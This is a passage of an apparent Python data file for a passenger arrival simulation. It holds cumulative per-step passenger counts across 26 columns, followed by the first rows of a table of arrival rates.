(259, 262, 194, 234, 177, 101, 113, 88, 103, 46, 40, 19, 0, 260, 201, 178, 152, 196, 122, 122, 83, 91, 74, 30, 15, 0), # 19
(273, 276, 205, 249, 192, 110, 118, 96, 109, 49, 42, 20, 0, 272, 217, 188, 156, 214, 132, 129, 86, 95, 79, 33, 15, 0), # 20
(291, 299, 217, 266, 210, 115, 124, 100, 114, 53, 42, 21, 0, 290, 231, 193, 167, 224, 143, 137, 90, 98, 85, 39, 15, 0), # 21
(301, 314, 229, 285, 224, 119, 128, 106, 120, 57, 47, 25, 0, 309, 248, 200, 180, 235, 151, 141, 92, 103, 92, 42, 15, 0), # 22
(314, 333, 243, 304, 235, 124, 137, 113, 125, 59, 50, 25, 0, 324, 263, 206, 189, 246, 159, 144, 92, 108, 99, 44, 15, 0), # 23
(328, 342, 252, 315, 248, 128, 142, 118, 133, 60, 52, 28, 0, 339, 280, 215, 197, 261, 174, 151, 95, 112, 103, 45, 15, 0), # 24
(346, 360, 272, 323, 259, 139, 148, 125, 135, 64, 53, 29, 0, 355, 300, 228, 208, 282, 183, 158, 98, 120, 107, 46, 15, 0), # 25
(370, 374, 287, 335, 271, 145, 159, 130, 142, 67, 58, 29, 0, 371, 318, 236, 218, 297, 189, 162, 102, 127, 110, 49, 17, 0), # 26
(385, 388, 298, 350, 286, 151, 161, 135, 149, 71, 60, 30, 0, 388, 329, 253, 230, 309, 195, 169, 103, 130, 113, 52, 19, 0), # 27
(395, 403, 316, 367, 302, 156, 166, 140, 157, 74, 63, 31, 0, 405, 348, 264, 240, 317, 205, 184, 105, 133, 119, 56, 21, 0), # 28
(409, 412, 337, 380, 314, 166, 170, 150, 163, 77, 65, 33, 0, 426, 356, 274, 255, 328, 208, 192, 108, 138, 120, 61, 22, 0), # 29
(422, 426, 348, 405, 329, 170, 178, 154, 169, 79, 67, 33, 0, 438, 374, 287, 268, 340, 215, 200, 110, 145, 123, 64, 24, 0), # 30
(438, 444, 363, 420, 343, 176, 181, 159, 181, 81, 70, 34, 0, 453, 386, 298, 278, 352, 225, 204, 116, 150, 129, 64, 26, 0), # 31
(458, 463, 381, 433, 352, 181, 187, 166, 185, 83, 72, 34, 0, 483, 407, 312, 290, 363, 232, 209, 124, 156, 133, 64, 28, 0), # 32
(479, 481, 391, 443, 363, 187, 193, 167, 189, 87, 74, 35, 0, 508, 425, 320, 301, 372, 239, 212, 126, 159, 138, 66, 28, 0), # 33
(497, 497, 408, 461, 377, 194, 200, 175, 196, 91, 75, 35, 0, 524, 439, 336, 308, 381, 247, 223, 129, 166, 142, 68, 32, 0), # 34
(518, 509, 420, 478, 386, 201, 206, 177, 203, 98, 76, 37, 0, 541, 454, 343, 315, 398, 253, 230, 132, 173, 147, 70, 32, 0), # 35
(533, 519, 429, 489, 395, 205, 216, 182, 209, 99, 77, 39, 0, 548, 471, 357, 324, 407, 257, 236, 139, 180, 157, 74, 34, 0), # 36
(543, 540, 448, 508, 408, 209, 223, 188, 212, 101, 79, 41, 0, 567, 485, 363, 332, 418, 262, 244, 139, 184, 162, 78, 36, 0), # 37
(563, 556, 470, 519, 424, 218, 233, 194, 217, 108, 80, 42, 0, 584, 494, 373, 341, 431, 271, 253, 142, 189, 167, 81, 37, 0), # 38
(578, 569, 484, 536, 436, 224, 241, 201, 221, 110, 82, 43, 0, 601, 508, 389, 352, 446, 273, 259, 147, 197, 171, 85, 39, 0), # 39
(595, 579, 507, 552, 447, 227, 254, 204, 225, 111, 84, 47, 0, 617, 524, 397, 367, 462, 284, 265, 155, 199, 176, 89, 39, 0), # 40
(607, 589, 513, 562, 457, 235, 264, 211, 229, 116, 85, 48, 0, 632, 545, 405, 381, 478, 295, 272, 158, 207, 181, 93, 39, 0), # 41
(628, 603, 528, 582, 467, 244, 270, 215, 235, 122, 87, 49, 0, 643, 564, 414, 391, 495, 302, 280, 160, 212, 188, 96, 40, 0), # 42
(651, 617, 540, 589, 476, 251, 276, 220, 237, 126, 87, 50, 0, 666, 582, 426, 402, 511, 311, 286, 165, 216, 193, 98, 44, 0), # 43
(667, 632, 557, 601, 481, 257, 280, 222, 241, 128, 87, 53, 0, 687, 601, 437, 414, 527, 320, 291, 170, 220, 198, 99, 44, 0), # 44
(679, 646, 576, 615, 492, 261, 289, 227, 249, 135, 88, 54, 0, 706, 615, 449, 421, 542, 322, 295, 176, 229, 201, 102, 47, 0), # 45
(688, 660, 587, 627, 502, 264, 295, 233, 255, 136, 93, 55, 0, 721, 629, 461, 431, 555, 326, 304, 179, 238, 202, 102, 48, 0), # 46
(709, 673, 596, 641, 523, 269, 300, 236, 266, 138, 97, 59, 0, 733, 644, 475, 441, 572, 333, 314, 183, 243, 208, 102, 49, 0), # 47
(721, 689, 612, 656, 535, 277, 309, 243, 272, 141, 99, 62, 0, 743, 661, 486, 446, 583, 346, 318, 186, 247, 214, 106, 50, 0), # 48
(735, 707, 624, 674, 545, 283, 317, 245, 277, 143, 102, 65, 0, 760, 673, 492, 453, 606, 351, 321, 193, 253, 221, 109, 50, 0), # 49
(755, 725, 634, 688, 554, 285, 322, 251, 283, 146, 105, 67, 0, 782, 689, 497, 458, 619, 359, 325, 201, 260, 225, 110, 51, 0), # 50
(770, 738, 639, 703, 568, 289, 332, 259, 289, 150, 107, 67, 0, 800, 698, 509, 470, 631, 370, 331, 206, 264, 227, 113, 51, 0), # 51
(789, 754, 651, 720, 575, 295, 342, 263, 293, 155, 109, 68, 0, 813, 716, 520, 477, 648, 382, 338, 207, 271, 233, 115, 53, 0), # 52
(800, 771, 671, 729, 584, 302, 347, 265, 299, 156, 111, 69, 0, 828, 736, 536, 486, 659, 388, 345, 209, 276, 240, 116, 53, 0), # 53
(816, 784, 686, 745, 595, 309, 353, 272, 301, 159, 116, 70, 0, 841, 748, 543, 499, 670, 395, 351, 213, 277, 251, 117, 54, 0), # 54
(835, 805, 705, 762, 604, 316, 357, 278, 308, 159, 116, 73, 0, 858, 758, 554, 505, 689, 400, 357, 218, 284, 258, 118, 56, 0), # 55
(856, 819, 718, 779, 616, 321, 365, 287, 314, 160, 117, 74, 0, 878, 765, 561, 513, 701, 407, 366, 220, 292, 266, 121, 57, 0), # 56
(873, 833, 729, 796, 623, 324, 373, 290, 320, 162, 121, 74, 0, 898, 782, 571, 520, 707, 415, 373, 226, 298, 272, 123, 60, 0), # 57
(886, 849, 738, 803, 641, 331, 379, 299, 329, 165, 123, 76, 0, 915, 794, 586, 534, 714, 421, 379, 234, 303, 277, 126, 63, 0), # 58
(906, 863, 748, 820, 654, 338, 386, 303, 337, 170, 125, 77, 0, 935, 810, 593, 544, 726, 425, 385, 238, 309, 281, 130, 65, 0), # 59
(927, 875, 763, 833, 667, 347, 398, 309, 344, 173, 127, 79, 0, 949, 822, 605, 550, 739, 433, 387, 245, 317, 287, 131, 65, 0), # 60
(947, 889, 780, 846, 682, 352, 401, 316, 350, 177, 128, 81, 0, 958, 832, 618, 556, 749, 437, 396, 249, 326, 294, 134, 67, 0), # 61
(954, 907, 795, 858, 699, 358, 406, 320, 355, 181, 128, 81, 0, 970, 847, 631, 568, 768, 443, 401, 254, 335, 295, 135, 69, 0), # 62
(975, 921, 809, 875, 714, 363, 418, 324, 365, 183, 132, 81, 0, 986, 859, 637, 579, 782, 445, 409, 259, 344, 303, 141, 72, 0), # 63
(1001, 938, 827, 895, 721, 371, 428, 329, 373, 185, 132, 83, 0, 1006, 878, 643, 588, 791, 453, 413, 263, 350, 306, 144, 75, 0), # 64
(1020, 952, 842, 916, 731, 379, 433, 331, 381, 189, 134, 84, 0, 1021, 896, 656, 597, 802, 460, 421, 264, 353, 311, 145, 76, 0), # 65
(1039, 968, 852, 931, 739, 383, 440, 337, 389, 192, 136, 85, 0, 1051, 909, 664, 606, 812, 473, 425, 269, 357, 315, 151, 77, 0), # 66
(1048, 977, 865, 952, 752, 394, 445, 340, 393, 193, 138, 87, 0, 1064, 928, 678, 613, 825, 481, 429, 272, 365, 318, 153, 79, 0), # 67
(1057, 992, 877, 975, 764, 396, 450, 352, 402, 197, 139, 88, 0, 1078, 940, 687, 621, 837, 489, 432, 276, 365, 323, 156, 80, 0), # 68
(1073, 1006, 886, 988, 780, 402, 456, 356, 407, 203, 141, 89, 0, 1088, 952, 693, 629, 841, 494, 436, 280, 370, 324, 156, 80, 0), # 69
(1085, 1028, 903, 995, 796, 409, 460, 359, 414, 205, 144, 90, 0, 1101, 968, 707, 632, 853, 500, 441, 286, 374, 332, 159, 84, 0), # 70
(1101, 1039, 916, 1010, 808, 412, 466, 364, 420, 209, 146, 90, 0, 1114, 977, 712, 640, 865, 504, 446, 291, 381, 338, 161, 84, 0), # 71
(1114, 1052, 933, 1025, 818, 416, 473, 367, 424, 209, 149, 90, 0, 1129, 988, 719, 649, 874, 508, 451, 295, 388, 346, 163, 85, 0), # 72
(1130, 1069, 945, 1045, 840, 422, 484, 371, 430, 214, 152, 90, 0, 1148, 997, 727, 660, 890, 512, 459, 302, 393, 350, 166, 85, 0), # 73
(1147, 1075, 959, 1056, 850, 432, 490, 377, 436, 215, 155, 92, 0, 1169, 1007, 740, 671, 901, 518, 465, 303, 400, 354, 168, 89, 0), # 74
(1159, 1085, 972, 1077, 863, 438, 498, 385, 448, 217, 157, 92, 0, 1184, 1019, 745, 675, 915, 524, 470, 305, 408, 360, 170, 92, 0), # 75
(1178, 1097, 989, 1093, 876, 445, 505, 395, 455, 221, 157, 93, 0, 1196, 1034, 753, 680, 931, 529, 472, 307, 416, 361, 170, 93, 0), # 76
(1196, 1107, 1004, 1105, 884, 448, 511, 397, 459, 223, 159, 94, 0, 1216, 1042, 765, 687, 941, 533, 478, 313, 425, 363, 172, 96, 0), # 77
(1204, 1115, 1017, 1121, 898, 452, 518, 400, 461, 225, 163, 94, 0, 1229, 1052, 776, 694, 960, 537, 488, 319, 431, 364, 176, 97, 0), # 78
(1219, 1128, 1029, 1132, 909, 455, 520, 404, 466, 232, 165, 95, 0, 1241, 1068, 779, 703, 975, 544, 492, 327, 442, 368, 182, 98, 0), # 79
(1235, 1143, 1047, 1148, 918, 457, 527, 408, 476, 239, 166, 95, 0, 1257, 1084, 791, 709, 993, 549, 495, 330, 448, 372, 186, 98, 0), # 80
(1250, 1159, 1051, 1167, 928, 462, 531, 412, 481, 243, 169, 98, 0, 1278, 1095, 803, 716, 1001, 551, 500, 332, 450, 379, 188, 100, 0), # 81
(1271, 1170, 1065, 1182, 943, 470, 537, 417, 484, 246, 171, 100, 0, 1297, 1105, 809, 723, 1009, 557, 501, 338, 453, 381, 194, 101, 0), # 82
(1282, 1186, 1073, 1196, 952, 475, 540, 421, 487, 248, 171, 101, 0, 1314, 1114, 822, 730, 1021, 564, 506, 347, 461, 388, 197, 101, 0), # 83
(1295, 1206, 1086, 1209, 968, 478, 543, 426, 498, 252, 171, 105, 0, 1339, 1126, 832, 745, 1037, 570, 510, 353, 465, 393, 199, 102, 0), # 84
(1309, 1214, 1099, 1221, 981, 482, 546, 428, 502, 254, 173, 106, 0, 1351, 1142, 844, 754, 1056, 577, 517, 359, 472, 397, 200, 102, 0), # 85
(1325, 1232, 1111, 1241, 993, 487, 551, 429, 510, 255, 174, 107, 0, 1370, 1161, 853, 760, 1067, 589, 521, 361, 480, 401, 202, 104, 0), # 86
(1350, 1251, 1124, 1257, 1003, 491, 558, 431, 512, 256, 175, 107, 0, 1396, 1175, 863, 770, 1081, 598, 524, 367, 488, 405, 203, 107, 0), # 87
(1367, 1263, 1132, 1273, 1014, 497, 563, 437, 518, 260, 177, 107, 0, 1409, 1195, 875, 779, 1092, 609, 534, 369, 496, 410, 204, 110, 0), # 88
(1377, 1273, 1142, 1288, 1022, 507, 575, 441, 526, 263, 182, 107, 0, 1427, 1208, 889, 785, 1104, 613, 547, 372, 502, 411, 208, 113, 0), # 89
(1389, 1282, 1156, 1299, 1038, 515, 580, 444, 534, 263, 184, 108, 0, 1436, 1217, 902, 793, 1116, 619, 550, 377, 507, 418, 208, 113, 0), # 90
(1407, 1293, 1166, 1312, 1048, 518, 585, 448, 539, 264, 187, 109, 0, 1460, 1228, 915, 800, 1126, 622, 555, 379, 512, 423, 211, 114, 0), # 91
(1424, 1309, 1177, 1329, 1064, 526, 591, 450, 542, 268, 187, 111, 0, 1481, 1241, 931, 809, 1140, 626, 559, 384, 516, 428, 213, 114, 0), # 92
(1438, 1323, 1183, 1345, 1071, 534, 602, 459, 550, 270, 191, 111, 0, 1498, 1254, 941, 815, 1153, 634, 564, 388, 521, 433, 216, 114, 0), # 93
(1460, 1331, 1191, 1357, 1080, 537, 602, 459, 553, 272, 192, 113, 0, 1513, 1266, 944, 826, 1162, 637, 571, 395, 529, 445, 219, 115, 0), # 94
(1478, 1338, 1205, 1366, 1087, 543, 609, 461, 560, 276, 195, 115, 0, 1530, 1286, 952, 832, 1173, 642, 572, 399, 541, 451, 223, 116, 0), # 95
(1496, 1348, 1214, 1378, 1097, 551, 618, 465, 564, 279, 200, 117, 0, 1554, 1301, 957, 842, 1185, 653, 577, 404, 549, 457, 225, 117, 0), # 96
(1511, 1358, 1225, 1394, 1108, 554, 623, 469, 567, 281, 203, 120, 0, 1567, 1312, 969, 850, 1197, 658, 581, 404, 559, 459, 228, 118, 0), # 97
(1533, 1367, 1235, 1403, 1120, 560, 630, 475, 573, 284, 204, 120, 0, 1582, 1332, 982, 859, 1207, 665, 587, 408, 567, 467, 231, 119, 0), # 98
(1548, 1384, 1244, 1416, 1128, 566, 636, 475, 577, 284, 206, 122, 0, 1600, 1347, 987, 870, 1221, 671, 594, 414, 571, 472, 232, 121, 0), # 99
(1564, 1398, 1256, 1427, 1138, 570, 642, 478, 582, 287, 208, 122, 0, 1613, 1359, 995, 878, 1233, 676, 598, 416, 576, 478, 239, 124, 0), # 100
(1578, 1405, 1269, 1443, 1149, 575, 645, 478, 589, 290, 210, 124, 0, 1632, 1367, 1004, 884, 1248, 684, 605, 421, 582, 481, 239, 126, 0), # 101
(1596, 1418, 1282, 1464, 1165, 586, 648, 483, 595, 293, 210, 126, 0, 1647, 1380, 1014, 893, 1263, 690, 610, 423, 587, 491, 241, 128, 0), # 102
(1611, 1431, 1294, 1480, 1175, 589, 654, 485, 601, 295, 210, 126, 0, 1660, 1390, 1029, 903, 1277, 702, 614, 426, 590, 494, 243, 129, 0), # 103
(1626, 1437, 1315, 1492, 1194, 595, 661, 489, 607, 296, 212, 129, 0, 1671, 1396, 1040, 910, 1291, 704, 622, 429, 594, 502, 246, 131, 0), # 104
(1644, 1450, 1327, 1507, 1207, 601, 663, 498, 615, 298, 217, 130, 0, 1686, 1416, 1050, 917, 1300, 709, 627, 432, 599, 505, 248, 132, 0), # 105
(1657, 1464, 1336, 1521, 1212, 613, 668, 501, 620, 301, 219, 130, 0, 1700, 1427, 1058, 919, 1313, 717, 634, 432, 603, 510, 248, 134, 0), # 106
(1672, 1477, 1351, 1536, 1228, 617, 671, 506, 625, 305, 219, 131, 0, 1715, 1441, 1073, 922, 1326, 722, 638, 436, 609, 512, 251, 135, 0), # 107
(1683, 1489, 1368, 1545, 1237, 621, 679, 515, 634, 308, 223, 132, 0, 1734, 1456, 1081, 929, 1334, 727, 642, 440, 610, 518, 253, 136, 0), # 108
(1696, 1503, 1385, 1555, 1249, 623, 684, 523, 639, 309, 223, 134, 0, 1747, 1472, 1088, 938, 1340, 732, 648, 445, 619, 523, 254, 136, 0), # 109
(1711, 1516, 1396, 1563, 1264, 626, 688, 529, 645, 311, 224, 134, 0, 1764, 1483, 1090, 942, 1348, 738, 652, 448, 623, 525, 254, 137, 0), # 110
(1724, 1527, 1407, 1578, 1282, 628, 696, 531, 647, 313, 227, 135, 0, 1777, 1497, 1100, 951, 1356, 744, 654, 456, 634, 533, 254, 139, 0), # 111
(1742, 1537, 1421, 1588, 1293, 634, 702, 534, 653, 315, 228, 136, 0, 1793, 1514, 1109, 958, 1369, 747, 659, 462, 639, 537, 256, 140, 0), # 112
(1753, 1545, 1433, 1597, 1297, 636, 705, 543, 654, 318, 233, 139, 0, 1808, 1523, 1116, 965, 1379, 753, 668, 470, 645, 539, 257, 140, 0), # 113
(1767, 1554, 1447, 1615, 1306, 639, 707, 547, 660, 323, 234, 141, 0, 1824, 1540, 1126, 974, 1390, 758, 672, 472, 655, 541, 261, 142, 0), # 114
(1775, 1559, 1462, 1627, 1318, 646, 713, 552, 665, 330, 236, 141, 0, 1839, 1552, 1134, 984, 1405, 762, 674, 474, 662, 546, 264, 144, 0), # 115
(1787, 1566, 1474, 1643, 1327, 654, 716, 557, 668, 335, 238, 142, 0, 1850, 1564, 1152, 991, 1418, 768, 681, 478, 667, 549, 265, 145, 0), # 116
(1802, 1575, 1484, 1657, 1340, 659, 726, 563, 672, 336, 240, 144, 0, 1859, 1574, 1163, 996, 1432, 772, 684, 484, 671, 552, 270, 146, 0), # 117
(1814, 1582, 1499, 1667, 1350, 666, 732, 569, 676, 339, 243, 145, 0, 1869, 1589, 1173, 1007, 1445, 777, 688, 489, 679, 558, 278, 146, 0), # 118
(1830, 1590, 1507, 1685, 1360, 671, 733, 574, 684, 341, 246, 145, 0, 1880, 1605, 1182, 1015, 1457, 783, 691, 491, 682, 564, 279, 146, 0), # 119
(1843, 1609, 1517, 1695, 1369, 676, 738, 578, 691, 345, 247, 146, 0, 1891, 1618, 1191, 1021, 1471, 787, 694, 493, 687, 568, 279, 147, 0), # 120
(1858, 1620, 1526, 1710, 1381, 682, 741, 582, 697, 349, 250, 147, 0, 1905, 1625, 1198, 1026, 1482, 797, 699, 497, 691, 571, 279, 148, 0), # 121
(1872, 1629, 1539, 1721, 1385, 687, 744, 588, 706, 351, 256, 147, 0, 1926, 1637, 1203, 1033, 1497, 804, 705, 503, 696, 574, 284, 149, 0), # 122
(1884, 1641, 1550, 1736, 1395, 695, 747, 592, 709, 353, 257, 149, 0, 1943, 1646, 1217, 1040, 1507, 809, 709, 504, 704, 576, 286, 150, 0), # 123
(1898, 1652, 1558, 1748, 1410, 699, 750, 600, 712, 355, 259, 149, 0, 1959, 1656, 1233, 1053, 1514, 811, 711, 505, 710, 581, 287, 150, 0), # 124
(1913, 1663, 1565, 1759, 1420, 703, 757, 603, 715, 357, 261, 150, 0, 1973, 1666, 1242, 1056, 1524, 815, 719, 513, 715, 584, 291, 150, 0), # 125
(1930, 1673, 1578, 1771, 1428, 709, 760, 605, 725, 362, 262, 150, 0, 1981, 1675, 1250, 1062, 1540, 820, 722, 516, 720, 588, 293, 150, 0), # 126
(1947, 1681, 1593, 1787, 1441, 714, 763, 609, 730, 362, 263, 151, 0, 1999, 1687, 1263, 1070, 1549, 823, 725, 521, 725, 595, 296, 150, 0), # 127
(1965, 1692, 1614, 1795, 1449, 718, 771, 612, 740, 367, 263, 152, 0, 2010, 1698, 1267, 1074, 1559, 832, 729, 524, 728, 597, 297, 152, 0), # 128
(1981, 1705, 1623, 1812, 1461, 722, 774, 615, 745, 369, 264, 152, 0, 2029, 1707, 1276, 1082, 1566, 836, 731, 525, 736, 603, 299, 153, 0), # 129
(1993, 1715, 1633, 1823, 1472, 726, 778, 619, 753, 370, 264, 152, 0, 2047, 1717, 1281, 1088, 1578, 843, 737, 529, 745, 609, 301, 155, 0), # 130
(2005, 1722, 1647, 1834, 1482, 730, 782, 623, 755, 371, 265, 153, 0, 2055, 1727, 1288, 1095, 1591, 848, 739, 533, 750, 612, 305, 157, 0), # 131
(2020, 1733, 1654, 1850, 1488, 732, 785, 626, 762, 371, 269, 155, 0, 2075, 1737, 1297, 1104, 1603, 860, 748, 536, 751, 615, 307, 158, 0), # 132
(2035, 1744, 1670, 1869, 1497, 738, 788, 628, 766, 373, 270, 155, 0, 2091, 1755, 1308, 1108, 1616, 868, 749, 542, 757, 621, 308, 158, 0), # 133
(2053, 1752, 1678, 1882, 1506, 746, 799, 631, 769, 375, 272, 157, 0, 2104, 1767, 1322, 1113, 1628, 872, 751, 549, 764, 623, 308, 159, 0), # 134
(2063, 1771, 1692, 1892, 1517, 749, 799, 636, 773, 377, 274, 157, 0, 2118, 1774, 1330, 1118, 1644, 875, 758, 553, 769, 628, 309, 161, 0), # 135
(2076, 1786, 1704, 1898, 1527, 756, 803, 639, 778, 377, 277, 157, 0, 2133, 1788, 1339, 1122, 1654, 886, 767, 559, 774, 634, 310, 162, 0), # 136
(2094, 1795, 1717, 1904, 1535, 759, 807, 643, 784, 377, 279, 159, 0, 2151, 1795, 1345, 1128, 1662, 891, 770, 562, 781, 638, 313, 163, 0), # 137
(2105, 1807, 1736, 1914, 1545, 765, 810, 650, 787, 378, 283, 159, 0, 2166, 1807, 1353, 1131, 1672, 896, 773, 565, 791, 640, 314, 163, 0), # 138
(2125, 1817, 1751, 1925, 1559, 767, 813, 656, 794, 379, 287, 161, 0, 2176, 1818, 1361, 1141, 1683, 898, 782, 570, 796, 650, 316, 165, 0), # 139
(2142, 1828, 1757, 1935, 1566, 774, 815, 662, 805, 381, 288, 161, 0, 2189, 1826, 1372, 1146, 1695, 900, 787, 571, 798, 652, 317, 168, 0), # 140
(2158, 1840, 1770, 1947, 1573, 779, 817, 668, 813, 382, 288, 163, 0, 2202, 1838, 1379, 1156, 1704, 903, 792, 574, 803, 655, 320, 169, 0), # 141
(2171, 1850, 1780, 1953, 1586, 783, 820, 672, 815, 387, 289, 164, 0, 2215, 1849, 1380, 1162, 1719, 914, 794, 576, 810, 657, 323, 171, 0), # 142
(2184, 1856, 1793, 1975, 1595, 787, 825, 674, 821, 389, 290, 165, 0, 2227, 1856, 1389, 1173, 1726, 916, 800, 579, 814, 666, 325, 171, 0), # 143
(2194, 1863, 1802, 1984, 1607, 791, 830, 680, 826, 392, 292, 165, 0, 2241, 1867, 1400, 1183, 1734, 920, 806, 583, 819, 667, 326, 173, 0), # 144
(2209, 1871, 1814, 2003, 1618, 795, 832, 685, 832, 398, 294, 166, 0, 2253, 1879, 1410, 1189, 1742, 927, 809, 589, 830, 671, 328, 173, 0), # 145
(2225, 1881, 1826, 2013, 1625, 800, 835, 689, 833, 398, 295, 168, 0, 2272, 1887, 1419, 1197, 1752, 932, 812, 592, 841, 674, 331, 174, 0), # 146
(2236, 1894, 1843, 2021, 1633, 806, 839, 693, 843, 403, 295, 170, 0, 2285, 1898, 1428, 1202, 1760, 938, 814, 595, 855, 680, 332, 177, 0), # 147
(2250, 1907, 1853, 2033, 1639, 813, 841, 697, 846, 406, 295, 172, 0, 2298, 1908, 1440, 1207, 1767, 941, 816, 598, 860, 681, 332, 178, 0), # 148
(2260, 1913, 1864, 2042, 1649, 821, 843, 701, 849, 406, 297, 173, 0, 2313, 1920, 1447, 1216, 1779, 944, 817, 599, 865, 685, 337, 178, 0), # 149
(2274, 1922, 1872, 2058, 1662, 824, 845, 704, 855, 408, 299, 174, 0, 2334, 1935, 1454, 1223, 1795, 946, 823, 604, 867, 687, 337, 179, 0), # 150
(2285, 1934, 1883, 2070, 1669, 826, 853, 710, 855, 411, 299, 175, 0, 2345, 1943, 1459, 1234, 1808, 950, 826, 609, 872, 691, 339, 180, 0), # 151
(2295, 1946, 1894, 2085, 1687, 828, 858, 712, 863, 413, 300, 177, 0, 2362, 1956, 1463, 1238, 1821, 956, 830, 610, 875, 699, 340, 181, 0), # 152
(2306, 1958, 1904, 2093, 1691, 834, 860, 721, 867, 417, 300, 177, 0, 2377, 1966, 1471, 1240, 1828, 962, 833, 610, 876, 701, 343, 183, 0), # 153
(2321, 1967, 1916, 2105, 1699, 842, 864, 726, 876, 418, 301, 179, 0, 2393, 1975, 1477, 1244, 1840, 969, 836, 615, 883, 706, 346, 183, 0), # 154
(2330, 1981, 1926, 2118, 1709, 849, 866, 732, 883, 419, 302, 180, 0, 2405, 1985, 1480, 1253, 1851, 973, 841, 617, 886, 711, 349, 183, 0), # 155
(2344, 1991, 1938, 2130, 1717, 856, 866, 735, 886, 423, 304, 181, 0, 2425, 2001, 1488, 1258, 1855, 974, 845, 623, 895, 716, 351, 183, 0), # 156
(2365, 1997, 1949, 2150, 1729, 858, 871, 737, 891, 424, 304, 182, 0, 2439, 2008, 1495, 1265, 1864, 982, 851, 626, 899, 722, 353, 183, 0), # 157
(2371, 2006, 1962, 2161, 1735, 862, 876, 740, 895, 428, 305, 183, 0, 2451, 2020, 1504, 1267, 1877, 987, 856, 629, 900, 727, 354, 184, 0), # 158
(2376, 2014, 1976, 2164, 1740, 866, 877, 742, 900, 428, 307, 184, 0, 2468, 2028, 1512, 1273, 1883, 992, 862, 631, 905, 730, 357, 186, 0), # 159
(2384, 2027, 1987, 2176, 1748, 870, 880, 750, 904, 428, 308, 185, 0, 2478, 2038, 1518, 1274, 1892, 996, 863, 632, 911, 733, 358, 186, 0), # 160
(2393, 2033, 2005, 2188, 1758, 876, 886, 752, 907, 429, 309, 186, 0, 2489, 2047, 1530, 1277, 1905, 1003, 867, 636, 916, 738, 360, 187, 0), # 161
(2404, 2041, 2011, 2195, 1768, 877, 889, 759, 913, 432, 309, 187, 0, 2497, 2062, 1536, 1286, 1921, 1008, 868, 638, 921, 741, 361, 187, 0), # 162
(2417, 2047, 2017, 2202, 1779, 886, 891, 761, 917, 432, 310, 187, 0, 2510, 2071, 1544, 1290, 1932, 1009, 870, 639, 924, 744, 364, 189, 0), # 163
(2425, 2052, 2033, 2215, 1787, 894, 894, 761, 921, 432, 310, 189, 0, 2522, 2083, 1552, 1297, 1942, 1017, 876, 642, 932, 746, 366, 189, 0), # 164
(2439, 2058, 2039, 2222, 1795, 898, 896, 762, 925, 434, 310, 191, 0, 2532, 2090, 1559, 1301, 1949, 1024, 879, 646, 935, 751, 367, 189, 0), # 165
(2443, 2071, 2052, 2232, 1809, 902, 901, 764, 930, 439, 312, 191, 0, 2547, 2093, 1571, 1303, 1965, 1029, 882, 649, 936, 754, 368, 190, 0), # 166
(2452, 2079, 2066, 2244, 1812, 904, 902, 768, 935, 442, 312, 193, 0, 2557, 2103, 1580, 1308, 1977, 1029, 886, 654, 944, 758, 368, 190, 0), # 167
(2470, 2085, 2076, 2252, 1820, 910, 903, 772, 942, 445, 312, 195, 0, 2568, 2114, 1589, 1313, 1983, 1036, 887, 655, 949, 760, 369, 190, 0), # 168
(2479, 2095, 2090, 2255, 1825, 915, 906, 776, 946, 446, 313, 197, 0, 2576, 2118, 1597, 1316, 1989, 1041, 889, 657, 953, 764, 372, 191, 0), # 169
(2487, 2106, 2100, 2261, 1833, 915, 910, 780, 952, 449, 313, 199, 0, 2589, 2123, 1604, 1319, 1990, 1048, 892, 660, 961, 766, 373, 193, 0), # 170
(2497, 2109, 2113, 2269, 1838, 920, 915, 784, 956, 450, 317, 200, 0, 2602, 2133, 1608, 1321, 1999, 1051, 892, 662, 968, 769, 378, 194, 0), # 171
(2512, 2112, 2120, 2276, 1844, 924, 916, 786, 958, 451, 318, 201, 0, 2611, 2141, 1613, 1328, 2006, 1051, 893, 664, 972, 771, 380, 196, 0), # 172
(2522, 2114, 2130, 2285, 1851, 929, 918, 791, 962, 451, 318, 201, 0, 2621, 2148, 1618, 1330, 2016, 1052, 896, 669, 977, 774, 380, 196, 0), # 173
(2529, 2117, 2136, 2292, 1857, 931, 921, 797, 967, 453, 319, 201, 0, 2629, 2152, 1625, 1339, 2023, 1054, 899, 672, 981, 779, 381, 196, 0), # 174
(2532, 2122, 2146, 2299, 1861, 934, 925, 800, 968, 454, 319, 201, 0, 2639, 2158, 1632, 1343, 2030, 1058, 899, 673, 982, 783, 382, 196, 0), # 175
(2541, 2126, 2153, 2304, 1868, 935, 928, 803, 971, 457, 319, 201, 0, 2644, 2169, 1637, 1346, 2034, 1060, 901, 677, 985, 786, 383, 196, 0), # 176
(2547, 2129, 2157, 2316, 1872, 939, 930, 805, 972, 457, 320, 201, 0, 2651, 2176, 1642, 1347, 2048, 1061, 905, 679, 987, 788, 384, 196, 0), # 177
(2553, 2131, 2165, 2319, 1877, 941, 932, 807, 976, 457, 322, 201, 0, 2659, 2181, 1643, 1350, 2054, 1064, 908, 682, 989, 790, 387, 197, 0), # 178
(2553, 2131, 2165, 2319, 1877, 941, 932, 807, 976, 457, 322, 201, 0, 2659, 2181, 1643, 1350, 2054, 1064, 908, 682, 989, 790, 387, 197, 0), # 179
)
passenger_arriving_rate = (
(8.033384925394829, 8.103756554216645, 6.9483776394833425, 7.45760132863612, 5.924997981450252, 2.9294112699015167, 3.3168284922991322, 3.102117448652949, 3.2480528331562706, 1.5832060062089484, 1.1214040437028276, 0.6530553437741565, 0.0, 8.134208340125381, 7.183608781515721, 5.607020218514138, 4.749618018626844, 6.496105666312541, 4.342964428114128, 3.3168284922991322, 2.0924366213582264, 2.962498990725126, 2.4858671095453735, 1.3896755278966686, 0.7367051412924223, 0.0), # 0
(8.566923443231959, 8.638755684745645, 7.407128788440204, 7.95017310393194, 6.317323026639185, 3.122918011773052, 3.535575153010955, 3.306342481937139, 3.462530840710885, 1.6875922769108604, 1.1954923029216353, 0.6961622214419141, 0.0, 8.671666635903767, 7.657784435861053, 5.9774615146081755, 5.06277683073258, 6.92506168142177, 4.628879474711995, 3.535575153010955, 2.230655722695037, 3.1586615133195926, 2.650057701310647, 1.4814257576880407, 0.7853414258859679, 0.0), # 1
(9.09875681436757, 9.171631583973436, 7.864056380729885, 8.440785245597754, 6.708227171999727, 3.3156527735449486, 3.7534548063685635, 3.5097501652696135, 3.676152963668026, 1.7915655100082188, 1.269286173007017, 0.7390976869404075, 0.0, 9.206983725135505, 8.13007455634448, 6.346430865035084, 5.374696530024655, 7.352305927336052, 4.913650231377459, 3.7534548063685635, 2.3683234096749635, 3.3541135859998636, 2.8135950818659183, 1.5728112761459772, 0.8337846894521307, 0.0), # 2
